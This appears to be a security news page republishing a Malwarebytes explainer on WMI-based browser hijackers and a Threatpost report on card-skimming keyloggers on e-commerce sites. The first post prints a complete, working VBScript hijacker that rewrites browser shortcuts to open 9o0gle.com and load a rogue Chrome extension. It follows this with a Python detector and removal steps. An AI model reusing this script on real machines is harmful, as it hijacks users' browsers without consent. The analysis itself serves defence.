The actions WMI executes in response to an event are defined by an event consumer stored in the WMI repository: for the ActiveScriptEventConsumer that is a VBScript or JScript script, while the CommandLineEventConsumer runs an arbitrary command line (often PowerShell). To view them, you will need to use special tools like WMI Explorer:


Effectively, the script is hidden from the user: it is not stored as a file on disk but inside the WMI repository (the OBJECTS.DATA file under %SystemRoot%\System32\wbem\Repository), which is why this is considered another fileless infection. WMI techniques were used by malware like Stuxnet in the past.

WMI also offers a great deal of tools to gather information about a system or a network.

How are the bad guys using WMI?

To answer this, let’s first look at how a WMI script is executed on a Windows system. The script is an instance of ActiveScriptEventConsumer (here named “ASEC”); a __FilterToConsumerBinding ties it to an __EventFilter whose WQL query decides when it fires, and the WMI script host scrcons.exe then runs it. Below is the code for a WMI script hijacker that we’re going to use as an example:

Dim objFS:Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
' Hijack URL appended to every browser shortcut; Chrome-based browsers also get an unpacked extension
Const link = "http://9o0gle.com/"
Const linkChrome = " --load-extension=""C:\Users\{username}1\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk"" http://9o0gle.com/"
' Browser executables whose shortcuts are rewritten
browsers = Array("IEXPLORE.EXE", "firefox.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe","chrome.exe","360chrome.exe")
ChromeBrowsers = Array("chrome.exe","360chrome.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
  BrowserDic.Add LCase(browser), browser
Next
Set ChromeBrowserDic = CreateObject("scripting.dictionary")
For Each ChromeBrowser In ChromeBrowsers
  ChromeBrowserDic.Add LCase(ChromeBrowser), ChromeBrowser
Next
' Locations that hold browser shortcuts: public and per-user Desktop, Start Menu,
' Startup, Quick Launch and the pinned Start Menu / taskbar items
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\{username}\Desktop"
FoldersDic(5) = "C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\{username}\AppData\Roaming"
FoldersDic(9) = "C:\Users\{username}\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\{username}\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\{username}\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
  For Each file In fso.GetFolder(FoldersDic(i)).Files
    If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
      set oShellLink = WshShell.CreateShortcut(file.Path)
      path = oShellLink.TargetPath
      name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
      If BrowserDic.Exists(LCase(name)) Then
        ' Replace the shortcut arguments so the browser opens the hijack URL on every launch
        If ChromeBrowserDic.Exists(LCase(name)) Then
          oShellLink.Arguments = linkChrome
        else
          oShellLink.Arguments = link
        End if
        ' Clear the read-only attribute (bit 1) so the shortcut can be rewritten
        If file.Attributes And 1 Then
          file.Attributes = file.Attributes - 1
        End If
        oShellLink.Save
      End If
    End If
  Next
Next
' Kill the WMI script host so the consumer exits once the shortcuts are rewritten
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0

Effectively, this WMI script hijacker sample looks for browser shortcuts in a list of folders. It then appends the hijacker’s URL—in this instance, 9o0gle.com—to these shortcuts, so when users double-click the Firefox browser shortcut, for example, the said .com site is also opened.


For Chrome-based browsers, a special extension is loaded. This extension is dropped to the drive, making this infection not completely fileless.
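Because the persistence lives in the WMI repository, the visible side effect is what an analyst has to hand: browser shortcuts whose Arguments field now carries a URL or a --load-extension switch. The block below is an added example, not Malwarebytes’ code or the hijacker’s: it implements the part of the Shell Link (MS-SHLLINK) format needed to read a shortcut’s target and arguments offline, then flags browser shortcuts with a URL or an unpacked extension in their arguments. The .lnk fixtures are built in the block itself rather than taken from an infected machine; the browser list is the one the hijacker script targets, trimmed to common names.

```python
"""Inspect Windows .lnk shortcuts for a URL or --load-extension appended to a
browser shortcut's arguments. Added example implementing the relevant part
of MS-SHLLINK; the fixture shortcuts are constructed here."""
import re
import struct

HEADER_SIZE = 0x4C
LINK_CLSID = b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
(HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_RELATIVE_PATH,
 HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION, IS_UNICODE) = (1 << i for i in range(8))
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                 (HAS_ICON_LOCATION, "icon_location"))
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe", "opera.exe", "safari.exe",
            "360chrome.exe", "360se.exe", "maxthon.exe", "qqbrowser.exe"}
SUSPICIOUS_ARGS = ((re.compile(r"--load-extension=", re.I), "loads an unpacked extension"),
                   (re.compile(r"https?://", re.I), "opens a URL on launch"))


def parse_lnk(data):
    """Return LocalBasePath (from LinkInfo) and the StringData fields of a shell link."""
    if len(data) < HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != HEADER_SIZE:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos, fields = HEADER_SIZE, {}
    if flags & HAS_ID_LIST:                       # IDListSize + ItemIDList, skipped
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:
        size, _hdr, li_flags, _vol_off, base_off = struct.unpack_from("<IIIII", data, pos)
        if li_flags & 1:                          # VolumeIDAndLocalBasePath: NUL-terminated ANSI path
            end = data.index(b"\x00", pos + base_off)
            fields["local_base_path"] = data[pos + base_off:end].decode("cp1252")
        pos += size
    for flag, name in STRING_FIELDS:              # CountCharacters, then the string, no terminator
        if flags & flag:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            if flags & IS_UNICODE:
                fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
                pos += 2 * count
            else:
                fields[name] = data[pos:pos + count].decode("cp1252")
                pos += count
    return fields


def check_shortcut(data):
    """Flag browser shortcuts whose arguments carry a URL or an unpacked extension."""
    f = parse_lnk(data)
    target = (f.get("local_base_path") or f.get("relative_path") or "").rsplit("\\", 1)[-1].lower()
    args = f.get("arguments", "")
    findings = [why for rx, why in SUSPICIOUS_ARGS if rx.search(args)] if target in BROWSERS else []
    return {"target": target, "arguments": args, "findings": findings}


def build_lnk(target_path, arguments):
    """Fixture builder: a minimal Unicode shell link with LinkInfo and arguments."""
    flags = HAS_LINK_INFO | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII", HEADER_SIZE, LINK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    volume_id = struct.pack("<IIII", 17, 3, 0, 16) + b"\x00"          # DRIVE_FIXED, empty label
    base = target_path.encode("cp1252") + b"\x00"
    size = 28 + len(volume_id) + len(base) + 1
    link_info = struct.pack("<IIIIIII", size, 28, 1, 28, 28 + len(volume_id), 0, size - 1)
    link_info += volume_id + base + b"\x00"                            # empty CommonPathSuffix
    enc = arguments.encode("utf-16-le")
    return header + link_info + struct.pack("<H", len(enc) // 2) + enc


FIREFOX = "C:\\Program Files\\Mozilla Firefox\\firefox.exe"
CHROME = "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe"
CLEAN = build_lnk(FIREFOX, "")
HIJACKED = build_lnk(FIREFOX, "http://9o0gle.com/")
HIJACKED_CHROME = build_lnk(CHROME, "--load-extension=\"C:\\Users\\alice\\AppData\\Local\\"
                                    "kemgadeojglibflomicgnfeopkdfflnk\" http://9o0gle.com/")
NOT_A_BROWSER = build_lnk("C:\\Tools\\curl.exe", "http://9o0gle.com/")

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN), ("hijacked", HIJACKED), ("chrome", HIJACKED_CHROME)):
        print(label, check_shortcut(blob))
```

Run check_shortcut over the bytes of every .lnk in the folders the hijacker script enumerates (both Desktops, the Start Menu trees, Quick Launch and the pinned items). Cleaning the shortcuts alone is not enough: the consumer in root\subscription (the __EventFilter, the ActiveScriptEventConsumer and the __FilterToConsumerBinding between them) rewrites them again the next time the filter fires, so remove the subscription first.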

So far, every WMI hijacker we have seen belongs to the same family, often referred to as Yeabests, named after the domain users are hijacked to.

File details

Malwarebytes detects this WMI hijacker as PUP.Optional.Elex.ClnShrt. Some elements of the resulting infection are detected as the more general PUP.Optional.WMIHijacker.ClnShrt. More details can be found in our removal guide for 9o0gle on the forums.

SHA1 9o0gle.exe:  ea6445c8e29b134d11d512c2faca974b91468ef9

Users of Malwarebytes Anti-Malware Premium are protected against this hijacker and against the connections the infection tries to make.

Summary

This post describes how WMI hijackers work and why they are hard to find on an affected system. It also shows an example of such a hijacker.

Source:https://blog.malwarebytes.com


The post Explained: WMI hijackers appeared first on Information Security Newspaper.

WEB-BASED KEYLOGGER USED TO STEAL CREDIT CARD DATA FROM POPULAR SITES


Popular ecommerce sites have been infected with web-based keyloggers that are being used to steal credit card data as it’s entered into online checkout forms. More than 100 compromised sites have been identified, but the number could be in the thousands, researchers said. RiskIQ, in collaboration with ClearSky, published their findings (PDF) Thursday, and said some of the ecommerce sites impacted include Everlast Worldwide, the Australian ecommerce site for apparel giant Guess and Fidelity Investments’ FidelityStore, a site maintained by a third-party firm SwervePoint.


In a statement to Threatpost, Fidelity Investments said the site is not one that “serves our customers or the general public” and is “hosted, managed and operated by a third-party vendor and is separate from Fidelity’s technology infrastructure, including the infrastructure that serves our customers.” It added it wasn’t aware of anyone affected “by this issue.” Everlast Worldwide declined to comment and representatives from SwervePoint and Guess did not reply to requests for comment.

The campaign is tied to a single unidentified hacking group, RiskIQ said, that began its most recent wave of attacks in March. Many of the sites are still actively stealing credit card data, according to Darren Spruell, threat researcher at RiskIQ. RiskIQ warned an undisclosed number of affected sites; however, Spruell said, only a tiny fraction acknowledged the notification. “When someone makes a purchase and enters their credit card data at these sites, that data is stolen and sent back to attackers in real time,” he said.

Researchers say many of the hacked ecommerce websites run the open source Magento ecommerce platform. Earlier this summer, researchers at Sucuri identified an uptick in the use of a new variant of a web-based keylogger, also called a credit card stealer, which stole credit card data in real time from the Magento ecommerce platform. However, RiskIQ said the hackers behind this most recent wave of attacks are similar but are targeting additional ecommerce platforms such as Powerfront CMS and OpenCart. Spruell said it isn’t clear what vulnerability attackers are exploiting, but added it could be any of a number of vulnerabilities within the server stack that would allow malware to be installed.

According to RiskIQ, the attackers place a “simple” script tag on the targeted ecommerce website. A script tag is a few lines of web code that can trigger additional actions, such as loading malicious JavaScript or additional scripts hosted on remote servers. When a checkout form is detected, the script tag injects the keylogger JavaScript from an external domain. Whenever credit card information is entered into the website, the data is forwarded to an attacker-controlled domain. By loading the JavaScript from a remote domain, the attacker can modify the malware source code without needing to reinfect the site, Sucuri said in its report. This attack method also has the advantage of ensuring that the credit card data is new and valid and that the accounts have funds available, Spruell said.

While web-based keyloggers and credit card stealers aren’t uncommon, RiskIQ believes these types of attacks are on the rise. Since March the threat actors behind this most recent campaign have grown more sophisticated, opting to use bulletproof hosting services and attacking a wider range of ecommerce platforms.

Source:https://threatpost.com


The post WEB-BASED KEYLOGGER USED TO STEAL CREDIT CARD DATA FROM POPULAR SITES appeared first on Information Security Newspaper.
